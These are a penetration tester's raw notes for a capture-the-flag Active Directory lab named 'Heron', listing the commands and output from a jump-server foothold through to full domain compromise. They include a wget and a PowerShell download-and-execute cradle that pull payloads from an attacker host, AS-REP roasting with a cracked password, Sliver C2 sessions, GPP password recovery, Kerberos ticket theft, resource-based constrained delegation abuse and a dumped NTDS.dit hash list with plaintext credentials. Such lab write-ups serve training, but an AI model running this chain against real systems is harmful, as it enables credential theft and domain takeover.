This is an assumed breach scenario. Heron Corp created a low-privileged local user account on a jump server for you.
Copy
pentest:Heron123!
10.10.249.133 mucdc.heron.vl heron.vl mucdc 10.10.249.134 frajmp.heron.vl
ssh pentest@frajmp.heron.vl
wget http://10.8.2.41/Apparent_judgment
use session_name
socks5 start
- access web page on the domain controller
- found three new users.
wayne.wood@heron.vl julina.pratt@heron.vl samuel.davies@heron.vl svc-web-accounting-d@heron.vl svc-web-accounting@heron.vl
Try ASREPROAST
proxychains -f /etc/proxychains4.conf impacket-GetNPUsers heron.vl/ -dc-host mucdc.heron.vl -usersfile users.txt
$krb5asrep$23$samuel.davies@heron.vl@HERON.VL:0b433ed62ad92e5b7b43f497d11bff85$39919ebacd4a46ff661aa8ec14255c2ead773d285a3817cf90514dcd8aadfd796b9c179e4952a1ab9fc3475f58891d9d79df736abc6e362e817611ec1915235f399dea251ae72c17d2320f1b0d723551223ea68dee403d227261f51a79b124d46c7f3250e566c7668aad59714fa2df73ae9b57b0415e4d5f32604690dde65f59fcb100fe7de1ea844a35f2f7ea3600971058af3d768a9f94bd9baa312c00fbaec724418e2d8e2343a3f7b900c47dff8559945e4c3bbaa18c8db7fcba6940b1bd6bd63620086da4b035cb564dcac54fe3910089d45a62b0286da791e1c49440c76ea7a002
samuel.davies
l6fkiy9oN
impacket-getTGT heron.vl/samuel.davies:l6fkiy9oN
nxc ldap mucdc.heron.vl --use-kcache -M adcs
Found PKI Enrollment Server: mucdc.heron.vl
ADCS 10.10.198.181 389 MUCDC Found CN: heron-CA
User: Description:
_admin Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain
krbtgt Key Distribution Center Service Account
Katherine.Howard T0 Windows Admin
Julian.Pratt T1 Linux Admin
Samuel.Davies Leaves Company 06/24
adm_hoka t0
adm_prju t1
ffuf -w /snap/seclists/current/Discovery/DNS/subdomains-top1million-110000.txt -u http://heron.vl/ -H 'Host: FUZZ.heron.vl' -fl 87
_PASS... 10.10.198.181 445 MUCDC Password: H3r0n2024#!
GPP_PASS... 10.10.198.181 445 MUCDC action: U
GPP_PASS... 10.10.198.181 445 MUCDC newName: _local
GPP_PASS... 10.10.198.181 445 MUCDC fullName:
GPP_PASS... 10.10.198.181 445 MUCDC description: local administrator
GPP_PASS... 10.10.198.181 445 MUCDC changeLogon: 0
GPP_PASS... 10.10.198.181 445 MUCDC noChange: 0
GPP_PASS... 10.10.198.181 445 MUCDC neverExpires: 1
GPP_PASS... 10.10.198.181 445 MUCDC acctDisabled: 0
GPP_PASS... 10.10.198.181 445 MUCDC subAuthority: RID_ADMIN
(New-Object System.Net.WebClient).DownloadString('http://10.8.2.41/amsi64.txt') | IEX
sliver (FLAT_WEEDKILLER) > ls
C:\ (19 items, 1.1 GiB)
=======================
drwxrwxrwx $Recycle.Bin <dir> Thu Jun 06 08:01:47 -0700 2024
drwxrwxrwx $WinREAgent <dir> Sat Jun 01 07:31:05 -0700 2024
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Sat May 25 19:07:58 -0700 2024
-rw-rw-rw- DumpStack.log.tmp 12.0 KiB Sun Jun 16 19:25:49 -0700 2024
-rw-rw-rw- flag.txt 36 B Sun Jun 02 03:45:42 -0700 2024
drwxrwxrwx home <dir> Sat Jun 01 08:10:46 -0700 2024
drwxrwxrwx inetpub <dir> Sun May 26 02:31:27 -0700 2024
drwxrwxrwx it <dir> Thu Jun 06 07:22:22 -0700 2024
-rw-rw-rw- pagefile.sys 1.1 GiB Sun Jun 16 19:25:49 -0700 2024
drwxrwxrwx PerfLogs <dir> Sat May 08 01:20:24 -0700 2021
dr-xr-xr-x Program Files <dir> Thu Jun 06 07:22:51 -0700 2024
drwxrwxrwx Program Files (x86) <dir> Sat Jun 01 07:30:43 -0700 2024
drwxrwxrwx ProgramData <dir> Sun Jun 02 08:24:36 -0700 2024
drwxrwxrwx Recovery <dir> Sat May 25 19:07:59 -0700 2024
drwxrwxrwx System Volume Information <dir> Sun May 26 02:48:42 -0700 2024
drwxrwxrwx transfer <dir> Sun May 26 04:51:27 -0700 2024
dr-xr-xr-x Users <dir> Sat Jun 01 08:43:04 -0700 2024
drwxrwxrwx webaccounting <dir> Sun Jun 16 20:07:37 -0700 2024
drwxrwxrwx Windows <dir> Sun Jun 02 08:26:03 -0700 2024
sliver (FLAT_WEEDKILLER) > cat flag.txt
VL{8f0f33fd2d2bad2152564ae5306daf70}
GETTING TGT
rubeus tgtdeleg /service:krbtgt /nowrap
../../tools/RubeusToCcache/rubeustoccache.py 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 svc-web-accounting.kirbi svc-web-accounting.ccache
export KRB5CCNAME=svc-web-accounting.ccache
nxc smb mucdc.heron.vl -u svc-web-accounting --use-kcache
SSH login AD
Krb5.conf
[libdefaults]
udp_preference_limit = 0
default_realm = HERON.VL
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 72h
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false
[realms]
HERON.VL = {
kdc = mucdc.heron.vl
admin_server = mucdc.heron.vl
}
[domain_realm]
.heron.vl = HERON.VL
heron.vl = HERON.VL
kvno host/frajmp.HERON.VL
sudo apt-get install krb5-user libpam-krb5 libpam-ccreds auth-client-config
ssh -K svc-web-accounting@HERON.VL@frajmp.HERON.VL
ssh _local@frajmp.HERON.VL
sliver (EMOTIONAL_GERANIUM) > cat ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "Deplete5DenialDealt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
VL{5112c412c73712e84fc3d01a30298760}
adm_pruj@heron.vl ayDMWV929N9wAiB4
Found from julian.pratt which had same passwoed as _local.
Resouce Based Constrained Delegation
rbcd.py -delegate-from FRAJMP$ -delegate-to MUCDC$ -action 'write' 'heron.vl/adm_prju'
➜ backup ../../../tools/KeytabParser/KeyTabExtract/keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HERON.VL
SERVICE PRINCIPAL : FRAJMP$/
NTLM HASH : 6f55b3b443ef192c804b2ae98e8254f7
AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
getST.py -spn 'cifs/mucdc.heron.vl' -impersonate '_Admin' 'heron.vl/frajmp$' -hashes 6f55b3b443ef192c804b2ae98e8254f7:6f55b3b443ef192c804b2ae98e8254f7
export KRB5CCNAME=_Admin.ccache
nxc smb mucdc.heron.vl -u _admin --use-kcache -M ntds.dit
_admin:500:aad3b435b51404eeaad3b435b51404ee:3998cdd28f164fa95983caf1ec603938:::
NTDSUTIL 10.10.181.69 445 MUCDC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL 10.10.181.69 445 MUCDC MUCDC$:1000:aad3b435b51404eeaad3b435b51404ee:9fce94a1965bf784e836b19fa35ead2f:::
NTDSUTIL 10.10.181.69 445 MUCDC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:6548c4cf2aac7a7d1b02d62b2e1a03d2:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Rachael.Boyle:24576:aad3b435b51404eeaad3b435b51404ee:9dbe3e4834072d582e8d93c892348e6a:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Anthony.Goodwin:24577:aad3b435b51404eeaad3b435b51404ee:b87a22f9ae78745edaf7070389e10bac:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Carol.John:24578:aad3b435b51404eeaad3b435b51404ee:46b1a4375e32c380a6dcf38a8bb7fb74:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Rosie.Evans:24579:aad3b435b51404eeaad3b435b51404ee:6e59150f19d36b11c49d060249e908ad:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Adam.Harper:24580:aad3b435b51404eeaad3b435b51404ee:a5468ccbf390bba74aaf5554f3d3555e:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Adam.Matthews:24581:aad3b435b51404eeaad3b435b51404ee:fa460c769bf2327c61e535787476e6a3:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Steven.Thomas:24582:aad3b435b51404eeaad3b435b51404ee:dd635bb1378d97b947b84f40886e9e64:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Amanda.Williams:24583:aad3b435b51404eeaad3b435b51404ee:6d33e1c539d3abe7fbfc15b09f1e94a5:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Vanessa.Anderson:24584:aad3b435b51404eeaad3b435b51404ee:d8b0393689f523f02daa715a9f49083e:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Jane.Richards:24585:aad3b435b51404eeaad3b435b51404ee:550f678b1a5b5bbe263860e4e6136910:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Rhys.George:24586:aad3b435b51404eeaad3b435b51404ee:2718fc2f944887ed9511d934e0249234:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Mohammed.Parry:24587:aad3b435b51404eeaad3b435b51404ee:01e7bba60d0469ea860ee8dfc83f5d80:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Julian.Pratt:24588:aad3b435b51404eeaad3b435b51404ee:5bb0b312fa6a1bd0b89b179e3e6f1288:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Wayne.Wood:24589:aad3b435b51404eeaad3b435b51404ee:7a2320fceec0c816bb48190ec143a2bb:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Danielle.Harrison:24590:aad3b435b51404eeaad3b435b51404ee:558ca476742a54e6f2d469ac4d1abadf:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Samuel.Davies:24591:aad3b435b51404eeaad3b435b51404ee:4a976cc04f49221cf1d950132f84ed2c:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Alice.Hill:24592:aad3b435b51404eeaad3b435b51404ee:c62c0e85ad1e975b14181f65bfff7257:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Jayne.Johnson:24593:aad3b435b51404eeaad3b435b51404ee:273b684425d847c07b05391a9f35f2ef:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\Geraldine.Powell:24594:aad3b435b51404eeaad3b435b51404ee:5003da60cacbbc1ba80df96d7af1e7e8:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\adm_hoka:24595:aad3b435b51404eeaad3b435b51404ee:4bb9e0417af7f8adedd01382f1453b38:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\adm_prju:24596:aad3b435b51404eeaad3b435b51404ee:80ae9e479b40971bc9cac183651dad05:::
NTDSUTIL 10.10.181.69 445 MUCDC MUCJMP$:24598:aad3b435b51404eeaad3b435b51404ee:ed656b46276f52cb5dae4ecdf0acd26c:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\svc-web-accounting:24602:aad3b435b51404eeaad3b435b51404ee:f9113ad2e51cee72034043daa948d5de:::
NTDSUTIL 10.10.181.69 445 MUCDC heron.vl\svc-web-accounting-d:26101:aad3b435b51404eeaad3b435b51404ee:bf95ac22b6d87880f9eb3dfdf3d416f9:::
NTDSUTIL 10.10.181.69 445 MUCDC ACCOUNTING-STAG$:26601:aad3b435b51404eeaad3b435b51404ee:7342a72fc3c418edeb9f98497c3857d4:::
NTDSUTIL 10.10.181.69 445 MUCDC ACCOUNTING-PREP$:26602:aad3b435b51404eeaad3b435b51404ee:7d9fb2f2bbf68b7d8dd52414bca20540:::
NTDSUTIL 10.10.181.69 445 MUCDC FRAJMP$:27101:aad3b435b51404eeaad3b435b51404ee:6f55b3b443ef192c804b2ae98e8254f7:::
VL{504bbfae9cade6a9f7c2b74c12ab1a01}
VL{5112c412c73712e84fc3d01a30298760}
VL{8f0f33fd2d2bad2152564ae5306daf70}